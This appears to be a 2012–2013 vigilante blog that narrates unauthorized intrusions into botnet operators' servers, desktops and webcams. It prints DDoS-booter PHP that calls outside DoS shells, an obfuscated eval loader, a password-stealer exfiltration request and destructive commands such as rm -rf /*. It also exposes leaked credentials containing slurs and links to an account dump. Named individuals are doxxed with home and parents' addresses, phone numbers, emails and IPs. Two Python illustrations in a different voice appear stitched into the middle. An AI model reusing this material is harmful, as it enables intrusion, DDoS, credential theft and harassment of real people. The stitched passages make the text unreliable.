Thursday, March 14, 2013

Digital and the Case of the Incorporated Security Hosting Specialists Inc., LLC

This is all a placeholder for now. Will update with more information in the near future.

Chris "Digital" Gravenstein

Owner of incorporatedhosting.info, strike-file-hosting.us, hostingforcheap.info, hosting-security-specialists.com, cheapreliablehosting.info, and many more completely legitimate and professional hosting "companies"/botnet C&Cs.


root@vps105299# rm -rf /*
root@vps105299# kill -9 -1




Sounds legit

Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}

So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

Saturday, December 8, 2012

Nick Moses, botnet master

Daily / Nick Moses is at it again.


Ran the uninstall command for a good few hours.

It reached about 250 executions
He logged in and noticed, removed it, and changed all his passwords.

Ran the command again; he noticed once more. This time he changed the database password, fucking up his own Blackshades panel for quite a few hours before he realized what he did.

Nick Moses, intrusion prevention expert

Finally I got in a third time and made a small modification to Blackshades' command processing file that would silently run the uninstall command. That took out the rest of his Blackshades bots. Over the course of the week about 1300 bots were uninstalled.

Blackshades panel credentials:
micknoses:Nigger123:67.189.249.252
apoc:copa:74.36.162.180
define('DB_SERVER', "localhost");
define('DB_USER', "root");
define('DB_PASS', "Nigger123");
define('DB_DATABASE', "niggers");
$CFG_PASSWORD = "Nigger123";
daily500:nigger123456@pool.bitclockers.com:8332 //Bitcoin pool credentials for his bots
Top notch security.


He also had the same password stealer as last time ("Pieces of Eight"). Wiped about 8000 password captures.

Here was some of the shit on his server:
$ ssh root@daily-apoc.com
root@daily-apoc.com's password: 
[root@Daily-Apoc ~]# ls -al
total 153340
drwxr-x---  3 root root     4096 Dec  1 19:53 .
drwxr-xr-x 20 root  500     4096 Dec  1 15:25 ..
-rw-------  1 root root      728 Dec  1 19:53 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-r--r--  1 root root 84733045 Sep 30 20:31 xampp-linux-1.8.1.tar.gz
-rw-r--r--  1 root root 39143077 Sep 30 20:31 xampp-linux-devel-1.8.1.tar.gz
-rw-r--r--  1 root root 33103312 Sep 30 20:31 xampp-linux-upgrade-1.8.0-1.8.1.tar.gz
drwxr-xr-x  3 root root     4096 Sep 30 12:52 xampp-upgrade
[root@Daily-Apoc ~]# last -ai
root     pts/1        Sun Dec  2 13:15 - 16:27  (03:11)     67.189.249.252
root     pts/0        Sat Dec  1 15:34 - 19:53  (04:18)     174.127.99.221
reboot   system boot  Sat Dec  1 15:25          (13:57)     0.0.0.0
root     pts/1        Sun Apr  5 19:36 - 19:36  (00:00)     81.152.164.227
root     pts/0        Sun Apr  5 19:28 - down   (00:07)     81.152.164.227
reboot   system boot  Sun Apr  5 19:28          (00:07)     0.0.0.0
root     pts/0        Sun Apr  5 19:24 - down   (00:02)     81.152.164.227
reboot   system boot  Sun Apr  5 19:24          (00:02)     0.0.0.0

wtmp begins Sun Apr  5 19:23:49 2009
[root@Daily-Apoc ~]# ls -al /opt/lampp/htdocs/installation/ /opt/lampp/htdocs/update/
/opt/lampp/htdocs/installation/:
total 172
drwxr-xr-x 9 root   root  4096 Dec  1 16:45 .
drwxr-xr-x 6 nobody root  4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  2000 Mar  2  2011 alive.php
-rw-r--r-- 1 root   root 10602 Mar  4  2011 bots.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 classes
-rw-r--r-- 1 root   root 14907 Mar  4  2011 cmd.php
-rw-r--r-- 1 root   root   522 Dec  1 16:40 config.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 db
-rw-r--r-- 1 root   root 12425 Mar  2  2011 dos.php
-rw-r--r-- 1 root   root  2502 Feb 28  2011 fg.php
-rw-r--r-- 1 root   root   978 Jan 14  2011 header.php
drwxr-xr-x 4 root   root  4096 Dec  1 16:44 img
-rw-r--r-- 1 root   root  2314 Jan 27  2011 index.php
-rw-r--r-- 1 root   root 12381 Mar  4  2011 install.php
-rw-r--r-- 1 root   root  1279 Dec 31  2010 logout.php
-rw-r--r-- 1 root   root  9018 Mar  4  2011 logs.php
-rw-r--r-- 1 root   root  6541 Mar  2  2011 main.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:34 pieces
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 plugins
-rw-r--r-- 1 root   root  9185 Feb 28  2011 pws.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 screens
-rw-r--r-- 1 root   root  1127 Mar  2  2011 scr.php
-rw-r--r-- 1 root   root  7746 Jan 26  2011 settings.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 webcam
-rw-r--r-- 1 root   root  6831 Mar  2  2011 webc.php

/opt/lampp/htdocs/update/: // CVE-2012-4681 Java driveby
total 28
drwxr-xr-x 3 root   root 4096 Dec  2 01:04 .
drwxr-xr-x 6 nobody root 4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  915 Dec  1 21:34 Certificate.crt
drwxr-xr-x 2 root   root 4096 Dec  2 01:06 download
-rw-r--r-- 1 root   root  782 Dec  2 00:49 index.php
-rw-r--r-- 1 root   root  782 Dec  2 00:49 install.php
-rw-r--r-- 1 root   root 3150 Dec  1 21:34 java.jar

// Blackhole iframe injector, deobfuscated URL is hxxp://blackhole.twilightparadox.com/analytics/except/turn-engineer_charges_got.php

[root@Daily-Apoc ~]# cat /opt/lampp/htdocs/videos/index.php
<script>//long obfuscated code</script>

// and finally
[root@Daily-Apoc ~]# rm -rf /*


He also recently managed to independently become infected with some malware himself, causing a bit of public embarrassment on a popular malware forum: http://trojanforge.com/showthread.php?t=1425

lol
He wasn't too happy about this turn of events.




Sunday, December 2, 2012

"Suit"

For the first time, we have a "developer" here on the skid list. Indeed, a professional programmer of great prowess and ingenuity.

He goes by the name "Suit" (also "saywh4t" and others) on skidforums: http://www.hackforums.net/member.php?action=profile&uid=438020

At first glance, he appears to be a typical "bot herder," trojan spreader, and password thief. Dime a dozen.

Bot exchanging service

lol


What makes him stand out, though, are his endeavoring malware development projects:

Shitty advertisement


Another shitty advertisement


Truly revolutionizing the field of skidware. Do his claims hold any water, though? What gives his "products" a competitive edge?

Suit, otherwise known as Reece Chambers, did all of his development for s00tbot with webhosting from xhostfire.com, a now-defunct web hosting service for skids.

I gently slipped a shell into his website's sandy beach and listened to its soft murmurs.

$ uname -a
Linux usa.xhostfire.com 2.6.18-274.18.1.el5.028stab098.1 #1 SMP Sat Feb 11 15:30:41 MSK 2012 i686 i686 i386 GNU/Linux
$ last -i
cunningp pts/0        130.216.30.121   Thu May 17 14:25 - 14:25  (00:00)
root     pts/0        70.95.123.70     Mon Apr 30 06:46 - down   (00:00)
sunnyval pts/0        174.56.103.168   Sun Apr  8 15:52 - 15:52  (00:00)
hackal   pts/0        46.99.251.19     Sun Apr  1 08:16 - 08:16  (00:00)
albini   pts/0        46.99.251.19     Sun Apr  1 08:15 - 08:15  (00:00)
socialen pts/0        96.44.101.216    Sat Mar 31 15:14 - 15:14  (00:00)
root     pts/0        85.76.123.168    Mon Mar 26 07:09 - down   (01:42)

$ ls -al ~/public_html/*

/home/cunningp/public_html/Website:
total 5672
drwxr-xr-x  7 cunningp cunningp    4096 May 23 02:43 .
drwxr-xr-x 12 cunningp nobody      4096 May 30 06:32 ..
-rw-r--r--  1 cunningp cunningp     220 Apr 25 17:42 .wysiwygPro_preview_339a5242a75565fc8cdd28b92e3ac846.php
drwxr-xr-x  2 cunningp cunningp    4096 May  2 22:34 Images
-rw-r--r--  1 cunningp cunningp 1419623 Apr 30 20:29 SecurityPanel(no_Install).zip
-rw-r--r--  1 cunningp cunningp 1406284 Apr 29 23:14 SecurityPanel.zip
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 18:43 SpryAssets
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 17:45 Templates
-rw-r--r--  1 cunningp cunningp    7741 May  3 22:01 about.php
-rw-r--r--  1 cunningp cunningp    2872 Apr 17 17:59 clients.html
-rw-r--r--  1 cunningp cunningp     923 Apr 26 23:04 clients.php
-rw-r--r--  1 cunningp cunningp    1682 May  1 21:02 config.php
-rw-r--r--  1 cunningp cunningp 2849380 May 30 16:39 error_log
-rw-r--r--  1 cunningp cunningp       0 May  1 20:48 gate.php
-rw-r--r--  1 cunningp cunningp     871 May  1 21:06 gatev2.php
-rw-r--r--  1 cunningp cunningp    1266 May  1 02:42 hidetest.php
drwxr-xr-x  2 cunningp cunningp    4096 May  4 08:08 include
-rw-r--r--  1 cunningp cunningp    2748 May  2 20:42 newClient.php
-rw-r--r--  1 cunningp cunningp    4137 May  2 21:43 newCommand.php
-rw-r--r--  1 cunningp cunningp    3274 May  2 20:32 newStat.php
-rw-r--r--  1 cunningp cunningp    2262 May  3 03:55 query.php
drwxr-xr-x  3 cunningp cunningp    4096 Apr 17 15:58 source
-rw-r--r--  1 cunningp cunningp    2133 Apr 23 01:37 statistics.html
-rw-r--r--  1 cunningp cunningp     751 Apr 25 20:38 stats.php
-rw-r--r--  1 cunningp cunningp    2459 Apr 27 02:55 style(original).css
-rw-r--r--  1 cunningp cunningp    4115 May  3 18:13 style.css
-rw-r--r--  1 cunningp cunningp    5372 May  2 19:28 test.php
-rw-r--r--  1 cunningp cunningp    2629 Apr 30 02:30 test2.php

[etc...]

$ ls -al /root              // root home dir is 777, lol
total 19416
-rw-r--r--  1 root root    10113 Mar  5 12:27       1
drwxrwxrwx 21 root root     4096 May 30 08:33 .
drwxr-xr-x 22 root root     4096 May 30 09:15 ..
-rw-------  1 root root      318 Apr 30 06:46 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
[snip]
drwxr-xr-x  2 root root     4096 Mar 24 20:14 gott4
-rw-r--r--  1 root root    26065 Jan 29 02:20 gott4.zip
-rw-r--r--  1 root root    36358 Mar 24 20:04 index.html
-rw-r--r--  1 root root    30580 Mar 24 20:04 index.html?h=96f62342bc4f8f81944d259b6e0c153e&t=1332579809&f=92c4469c
-rwx------  1 root root     1067 Jan 10  2006 install.sh
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.1
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.2
drwxr-xr-x  2 root root     4096 Jan 17 18:25 public_ftp
drwxr-xr-x  3 root root     4096 Jan 17 18:25 public_html
-rw-r--r--  1 root root    12027 Mar 24 20:11 slow.pl
-rw-r--r--  1 root root     1286 Mar 24 20:06 syn.pl
drwxr-xr-x  3 root root     4096 May 30 02:41 tmp
-rwx------  1 root root      443 Jan 10  2006 uninstall.ddos
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.1
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.2



Here's some of his botnet panel code; his comments prefaced with "//", mine with "/*".

$hwid = ($_POST['hwid']);  //Collects hwid
...
$pc = ($_POST['pc']);    //Collects pc name
/* what ever would I do without those helpful comments */
$query = "INSERT INTO `".$sqlSettings['tableVisitorsList']."`";
$query .= "VALUES('', '$ipAddress', '$hwid', '$pc', '$os', '$status', '$country', '$mode', '', '$tStamp', '$tStamp', '', '')";
/* this looks perfectly safe */
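As an added illustration (my own code, not the panel's; a reduced SQLite table stands in for tableVisitorsList), here is the check-in INSERT built by string concatenation exactly as above, beside a parameterized version. A client-supplied pc name containing a single quote breaks the concatenated statement but is stored verbatim by the parameterized one:

```python
import sqlite3

# Constructed stand-in for the panel's visitors table (columns reduced from the
# page's thirteen to the ones the snippet names).
SCHEMA = """CREATE TABLE visitors (
    id INTEGER PRIMARY KEY, ip TEXT, hwid TEXT, pc TEXT, os TEXT,
    status TEXT, country TEXT, mode TEXT, first_seen INTEGER, last_seen INTEGER)"""


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def insert_concatenated(conn: sqlite3.Connection, fields: dict, ts: int) -> None:
    # Same construction as the page's $query: every client-controlled value is
    # spliced into the SQL text, so the client decides where each string ends.
    query = (
        "INSERT INTO visitors VALUES(NULL, '%(ip)s', '%(hwid)s', '%(pc)s', "
        "'%(os)s', '%(status)s', '%(country)s', '%(mode)s', %(ts)d, %(ts)d)"
        % dict(fields, ts=ts)
    )
    conn.execute(query)


def insert_parameterized(conn: sqlite3.Connection, fields: dict, ts: int) -> None:
    # Placeholders: the driver passes values separately from the statement text,
    # so a quote inside a value can never change the statement's structure.
    conn.execute(
        "INSERT INTO visitors VALUES(NULL, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
        (fields["ip"], fields["hwid"], fields["pc"], fields["os"],
         fields["status"], fields["country"], fields["mode"], ts, ts),
    )


def compare(pc_name: str) -> dict:
    """Run both inserts with the same check-in; report whether each survived and what was stored."""
    # Constructed sample check-in; only the pc name varies between calls.
    fields = {"ip": "203.0.113.7", "hwid": "ABCD-1234", "pc": pc_name,
              "os": "Win7", "status": "online", "country": "NZ", "mode": "normal"}
    result = {}
    conn = new_db()
    try:
        insert_concatenated(conn, fields, 1354406400)
        result["concatenated_ok"] = True
    except sqlite3.OperationalError as exc:
        result["concatenated_ok"] = False
        result["concatenated_error"] = str(exc)
    conn = new_db()
    insert_parameterized(conn, fields, 1354406400)
    result["parameterized_stored"] = conn.execute("SELECT pc FROM visitors").fetchone()[0]
    return result


if __name__ == "__main__":
    print(compare("Bob's Laptop"))
```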

He also made his own proprietary PHP "obfuscator" for distributing the source, which sadly enough I'm sure will still stop most script babbies.

function kEFFEX($NmkVE)
{
    $NmkVE = gzinflate(base64_decode($NmkVE));
    for ($i = 0; $i < strlen($NmkVE); $i++)
    {
        $NmkVE[$i] = chr(ord($NmkVE[$i]) - 1); /* this ain't your father's gzinflate base64decode...he subtracts 1 and renames some variables too! */
    }
    return $NmkVE;
}
eval(kEFFEX('longfuckingstring'));
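An added static decoder for the kEFFEX scheme above (my own example, not code from the page or from Suit's panel): it reverses base64, raw DEFLATE and the per-byte subtraction without evaluating anything, and peels nested eval(kEFFEX('...')) layers in a loop, since such loaders are commonly stacked. The sample payload and the encoder that builds it are constructed here for the demonstration:

```python
import base64
import re
import zlib

# Matches the loader call at the bottom of the obfuscated file: eval(kEFFEX('<base64>'));
LOADER_RE = re.compile(r"eval\(kEFFEX\('([A-Za-z0-9+/=]+)'\)\);?")


def keffex_decode(blob: str) -> bytes:
    """Reverse kEFFEX(): base64 -> gzinflate (raw DEFLATE, no zlib header) -> subtract 1 per byte.
    PHP's chr() wraps modulo 256, so 0x00 - 1 becomes 0xFF; the & 0xFF reproduces that."""
    inflated = zlib.decompress(base64.b64decode(blob), -zlib.MAX_WBITS)
    return bytes((b - 1) & 0xFF for b in inflated)


def keffex_encode(src: bytes) -> str:
    """Inverse transform, used only to construct a sample (the page shows no packer side)."""
    shifted = bytes((b + 1) & 0xFF for b in src)
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode("ascii")


def peel_layers(php_source: str, max_layers: int = 50) -> tuple:
    """Replace eval(kEFFEX('...')) with its decoded payload until no loader call remains.
    Returns (innermost source, number of layers removed). Nothing is ever executed."""
    layers = 0
    while layers < max_layers:
        match = LOADER_RE.search(php_source)
        if not match:
            break
        php_source = keffex_decode(match.group(1)).decode("latin-1")
        layers += 1
    return php_source, layers


def wrap(payload: str) -> str:
    """Constructed sample: the page's loader stub followed by an encoded payload."""
    stub = ("function kEFFEX($s){$s=gzinflate(base64_decode($s));"
            "for($i=0;$i<strlen($s);$i++){$s[$i]=chr(ord($s[$i])-1);}return $s;}")
    return stub + "eval(kEFFEX('" + keffex_encode(payload.encode("latin-1")) + "'));"


# Constructed innermost payload standing in for the real panel code.
INNER = "<?php $gate = 'gatev2.php'; echo 'panel'; ?>"


def build_sample() -> str:
    return wrap(wrap(INNER))  # two nested layers, as stacked packers produce


if __name__ == "__main__":
    source, n = peel_layers(build_sample())
    print(n, "layers removed")
    print(source)
```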

The binary itself is some shitty generic C#. Really making waves. Yawn.


Anyway, next I moved onto his Dropbox.

He put a very frightening legal notice inside his Dropbox folder:

DROPBOX EMPLOYEE'S PLEASE NOTE: All items in this folder are protected by the Digital Millennium Copyright Act,


Scanning, Decompiling, Executing, or Submitting these files to any entity without the expressed permission of Myself


is ILLEGAL and a VIOLATION of the DMCA laws and If you violate these laws we will contact our lawyers

I immediately stopped surveying the contents of the folder and DBAN'd my drive to avoid the risk of a lawsuit.

Since he foiled my plans to look at his Dropbox, I was about ready to throw my arms in the air and give up.

However, I got to thinking. His Dropbox was off-limits, but why not just remote into his desktop? I didn't see any mention of that in the DMCA warning. A loophole!

So I did, just to take a peek.

Just snapped a few brief shots. I certainly did not want to intrude!


Reece viewing his own botnet panel
Chatting with friends
Presumably transferring malware to another computer of his



I wanted to get a more personal look at Mr. Chambers. So much more can be conveyed in person than through cold, drab internet posts.

So, I sent an electromagnetic pulse to his webcam's lens and peered through it.

Hey, I can barely see you!
That's better.

So there're my observations of his programming abilities and top notch security safeguards.

Finally, here's a bit of info about Reece. All previously mentioned files, including his website and more goodies, are located at the bottom.

Suit/Hyphee/saywh4t (Reece Chambers)
http://www.hackforums.net/member.php?action=profile&uid=438020

Reece Chambers
10 Ngataringa Rd.
Devonport, Auckland
0624
New Zealand
Phone: 09-445 4496

Emails:

hyphee@windowslive.com (MSN)
saywh4t@gmail.com
subjective.suit@gmail.com
hyphee@gmail.com
r.hyphee@gmail.com

Facebook: http://www.facebook.com/reece.chambers.58
Stalker Facebook: http://www.facebook.com/profile.php?id=100002535412838
"crackhackforum" account: http://www.crackhackforum.com/user-26879.html
Skype: rsnoopyc

Usernames:

Suit
Hyphee
TheRealHyphee
saywh4t

Aliases:

George Tubby
George Phuey

Domains:

cunningpanda.com
xhpel.co.cc
youlaugh.co.cc
lots more

Files: http://www.mediafire.com/?zh65o6rc6ge6gz9
(may be flagged by AV due to his malware binaries)


A lot more blog updates coming soon.
Spread the word

Monday, November 5, 2012

SkypeLocus


http://www.hackforums.net/showthread.php?tid=2918767&pid=27842962#pid27842962


Some shitty free Skype resolver, for skids by skids. Had some gaping holes in it so I politely disabled its services.



It was running off a Windows box in the guy's house. Owner is from Denmark: http://www.ip-adress.com/ip_tracer/80.162.24.46

Looking at what's in his web root directory should provide all the evidence you need to see he is most certainly a skid (various botnet panels and live "booters").

> whoami
nt authority\system

> dir C:\Users\Server
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\Users\Server

09/22/2012  07:41 AM    <DIR>          .
09/22/2012  07:41 AM    <DIR>          ..
08/18/2012  02:46 PM    <DIR>          Contacts
10/27/2012  06:27 AM    <DIR>          Desktop
09/02/2012  11:31 AM    <DIR>          Documents
10/26/2012  12:47 PM    <DIR>          Downloads
08/18/2012  02:47 PM    <DIR>          Favorites
08/18/2012  02:46 PM    <DIR>          Links
08/18/2012  02:46 PM    <DIR>          Music
08/18/2012  02:46 PM    <DIR>          Pictures
08/18/2012  02:46 PM    <DIR>          Saved Games
09/03/2012  09:34 AM    <DIR>          Searches
08/18/2012  03:59 PM    <DIR>          temp
08/18/2012  02:46 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  37,749,161,984 bytes free

> dir C:\Users\Server\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\Users\Server\Desktop

10/27/2012  06:27 AM    <DIR>          .
10/27/2012  06:27 AM    <DIR>          ..
10/13/2012  07:44 AM             2,819 addshells.php
07/30/2012  10:39 PM    <DIR>          Autodeleter
10/01/2012  06:05 AM               110 banned-ips.txt
10/01/2012  06:05 AM               110 banned-players.txt
04/16/2011  09:44 PM             1,554 boatnet.sql
10/15/2012  03:40 PM         4,115,551 Cythisia Botnet v2.rar
01/26/2011  04:26 PM             4,801 dbprepare.sql
10/07/2012  03:30 AM           974,841 Desktop.rar
09/06/2012  11:42 PM            10,578 import.sql
09/14/2012  06:23 AM                70 index.php
09/06/2011  07:09 AM            41,085 legionbo_booter.sql
10/08/2012  07:37 AM         1,260,241 muffin man ragebooter.zip
10/01/2012  06:44 AM                11 ops.txt
03/03/2011  11:30 AM             4,135 phantacdb.sql
10/14/2012  05:22 PM    <DIR>          Phoenix Emulador 3.7.1
10/14/2012  04:43 PM    <DIR>          PhoenixPHP2.0.4
02/14/2011  02:19 PM             1,190 postbit_reputation.gif
10/02/2012  09:35 AM            22,476 server.log
10/01/2012  06:05 AM               511 server.properties
09/01/2012  12:32 AM    <DIR>          Skypestuff - Copy
10/10/2011  10:57 AM           179,200 VNBuilded.exe
06/20/2011  04:01 PM         1,654,784 VNBuilder.exe
10/01/2012  06:05 AM                 0 white-list.txt
10/02/2012  09:35 AM    <DIR>          world
10/02/2012  11:12 AM               623 XAMPP Control Panel.lnk
              20 File(s)      8,274,690 bytes
               7 Dir(s)  37,749,161,984 bytes free

> dir C:\xampp\htdocs
 Volume in drive C has no label.
 Volume Serial Number is 4CD8-9BBC

 Directory of C:\xampp\htdocs

10/26/2012  03:37 PM    <DIR>          .
10/26/2012  03:37 PM    <DIR>          ..
10/05/2012  05:34 AM             1,569 252939482935237498.php
10/31/2012  08:53 AM    <DIR>          51234213
10/06/2012  02:48 AM    <DIR>          Abstract
09/27/2012  11:02 AM                52 Accident.php
09/10/2012  05:39 PM            11,670 admin.php
10/19/2012  10:10 AM    <DIR>          Alex
09/14/2012  07:15 AM             1,793 Anonymous.php
10/31/2012  04:47 AM             1,942 APIresolve.php
09/10/2012  10:00 AM    <DIR>          assets
09/02/2012  12:30 AM                 6 banned.php
10/14/2012  05:16 AM    <DIR>          Blackout
10/09/2012  09:00 AM    <DIR>          blacks
10/05/2012  02:18 PM    <DIR>          boot
10/02/2012  10:07 AM    <DIR>          booter
10/05/2012  02:02 PM    <DIR>          bootz
10/15/2012  03:43 PM    <DIR>          botnn
09/27/2012  11:03 AM                52 brazzter.php
09/05/2012  09:44 AM               118 chatpost.php
09/27/2012  11:03 AM                52 CodingHoster.php
09/10/2012  10:00 AM               119 config.php
10/11/2012  06:07 PM    <DIR>          css
09/03/2012  10:47 AM               102 db.php
07/27/2012  07:11 PM             5,476 EdgeChecker.php
10/24/2012  01:27 PM    <DIR>          email
10/19/2012  01:03 PM             1,021 email.php
09/27/2012  11:03 AM                52 exe1.php
09/02/2012  11:26 AM             2,550 favicon.ico
10/25/2012  11:04 AM    <DIR>          form
10/25/2012  12:10 PM    <DIR>          forum
10/24/2012  07:28 AM    <DIR>          forums
10/30/2012  12:10 PM    <DIR>          Gantic
09/30/2012  11:50 AM               614 gethw.php
10/12/2012  02:52 PM             1,372 he.php
09/27/2012  10:31 AM               846 Here.php
09/27/2012  11:03 AM                52 hereisit.php
10/15/2012  10:16 AM    <DIR>          hotel
10/08/2012  10:24 AM                15 hwids.txt
09/27/2012  11:03 AM                52 ignace.php
10/02/2012  10:55 AM    <DIR>          images
09/09/2012  04:25 AM    <DIR>          includes
11/04/2012  06:15 AM                68 index.php
11/01/2012  01:59 AM         2,777,838 ips.html
11/04/2012  06:16 AM             3,774 login.php
09/09/2012  04:30 PM               142 logout.php
10/10/2012  07:27 AM    <DIR>          Loki Rat
10/24/2012  01:19 PM               342 mail.php
09/10/2012  05:41 PM             6,528 makeUser.php
09/27/2012  11:03 AM                52 MessiahSkypeLF.php
10/14/2012  10:47 AM               392 Multiboot.php
09/11/2012  05:05 AM                57 Myip.php
10/13/2012  07:19 AM    <DIR>          newboot
10/03/2012  01:26 PM             1,566 newphp.php
10/08/2012  10:31 AM                 7 Onlineornot.php
08/18/2012  05:37 PM    <DIR>          overlayinfo
09/10/2012  10:00 AM    <DIR>          plugins
09/27/2012  11:03 AM                52 PonyBlaze.php
10/14/2012  11:23 AM    <DIR>          power
09/10/2012  12:59 PM               304 pwCheck.php
09/10/2012  05:15 PM             6,881 register.php
10/11/2012  06:08 PM             2,442 Rename.php
09/01/2012  06:21 PM             2,663 Resolver - backup.php
11/04/2012  08:20 AM             2,484 resolver.php
09/14/2012  07:15 AM             1,793 Shockwave72.php
11/04/2012  08:20 PM    <DIR>          Skypehru
10/03/2012  01:56 PM                21 SkypelocaAPI.php
10/07/2012  11:10 AM    <DIR>          stea
10/01/2012  12:24 PM                64 Sunlight.php
09/02/2012  11:33 AM    <DIR>          templates
10/01/2012  12:23 PM                65 test.php
10/19/2012  01:04 PM             1,027 text.php
09/14/2012  07:15 AM             1,793 thefile.php
09/17/2012  01:58 AM                41 ThisistheAPI.php
10/13/2012  11:03 AM    <DIR>          Uploads
09/27/2012  11:04 AM                52 vanity.php
09/27/2012  11:04 AM                52 Vincent1468.php
10/13/2012  09:30 AM            15,366 web_ninja_zixem.php
08/20/2012  03:50 AM               263 Welcome.php
09/14/2012  07:16 AM             1,793 what.php
09/27/2012  11:04 AM                52 wildfire_FsKCheese.php
              51 File(s)      2,857,499 bytes
              30 Dir(s)  37,749,014,528 bytes free
              

> ipconfig

Windows IP Configuration


Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::9145:d440:a419:b3d0%19
   IPv4 Address. . . . . . . . . . . : 192.168.0.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1
   

> ping 192.168.0.1

Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=2ms TTL=64
Reply from 192.168.0.1: bytes=32 time=6ms TTL=64
Reply from 192.168.0.1: bytes=32 time=5ms TTL=64
Reply from 192.168.0.1: bytes=32 time=2ms TTL=64

Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 2ms, Maximum = 6ms, Average = 3ms
    
// would take too much effort to fuck with his network; if it was Linux, maybe...

It had quite a lot of interesting shit on it. Databases, source code, and tons of other goodies. May release it at some later point.

Friday, September 7, 2012

"Daily"

Hey guys, sorry for the lack of updates. I've got a lot of content I'm gathering for a bunch of posts, but it'll take me some time to organize it all.

I just wanted to break the silence to make a brief post about a skid I found who goes by the name of Daily, aka Nick Moses.

Skidforums profile: http://www.hackforums.net/member.php?action=profile&uid=99678



He's apparently been one of the biggest 4chan malware spreaders, constantly spamming up all the boards with links to shitty Java drivebys and such. He's been doing this for years now, but he's ramped up his skid efforts in the past two months.

A few examples:

https://archive.installgentoo.net/g/thread/17666171 (2011)
https://archive.installgentoo.net/g/thread/27294499 (2012)
https://archive.installgentoo.net/g/thread/27279939 (2012)

He's even been getting into the hearts of weeaboos and redirecting them to Java drivebys (with some code he copied and pasted from 1 of 2,000 security blogs).

http://archive.foolz.us/jp/thread/9657436/#9657603

He also is apparently somewhat of a 4channer himself. Here's him attentionwhoring in an old moot sticky:


Just Google any of his domains, which I'm going to list towards the bottom, and you'll see tons and tons of 4chan hits. This is only a tiny sampling.

Seems he's mostly been spreading Blackshades lately, developed and sold by the fine gentlemen in the below blog post. After a few "issues" he's started only spreading DarkComet instead. But anyway, onto the fun stuff.


First, I found his Blackshades panel install, and graciously liberated him of his bots and logs to save him some money on bandwidth and hard drive space.

About 250 bots were uninstalled by the time it finished

I also found some kind of stolen password storage panel on his website mosesmusic.net. It's tied to some shitty VB password stealer.

Analysis: http://malwr.com/analysis/24a8aa62c2e2a5caffcd400552cb60e7/
Request: http://mosesmusic.net/backup/index.php?action=add&username=Me&password=DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ&app=Windows&pcname=LAB&sitename=Microsoft

I continued to be of assistance, and helped him free up a few megs (or however much it takes to store 16,000 passwords).

Password stealer panel



I went one step further and performed a "citizen's revokal" of all his domains, by order of acclaimed domain authority Meatspin Inc.

utilities.3utilities.com (used for RAT connections)
Logged into his Namecheap account
An order he made
Giving 67.55.108.167 some much needed traffic



I've got some more shit but I won't bore you with the details. I currently have all his domains, though he's trying to recover them and probably trying to register some new ones. When that happens I will be in talks with Namecheap.

Go hog wild.


Daily - Nick Moses

http://www.hackforums.net/member.php?action=profile&uid=99678

Nicholas (Nick) Moses
Age: 21

16 Water St
Orleans, VT 05860-1306
United States
(802) 754-1050

Parents' address (possibly old; above address may be their current one):

Jay Moses (Father) & Wanda Moses (Mother)
3258 Glen Rd
Newport, VT 05855-9043
United States
(802) 334-4522


Went to Champlain College in Vermont: http://www.champlain.edu

College dorm/apartment address as of 2010:

Nick Moses
Mailbox #663
Champlain College
P.O Box 670
Burlington, VT 05402


Associated IP Addresses:

71.80.41.168 - Used for malware hosting and bitcoins, appears residential, probably current home IP. Being used right now as DarkComet C&C. (ISP: Charter)
68.114.56.227 - Home IP, probably old (ISP: Charter)

94.249.213.172 - Previously hosted nickmoses.net
76.191.96.58 - Previously hosted mosesmusic.net
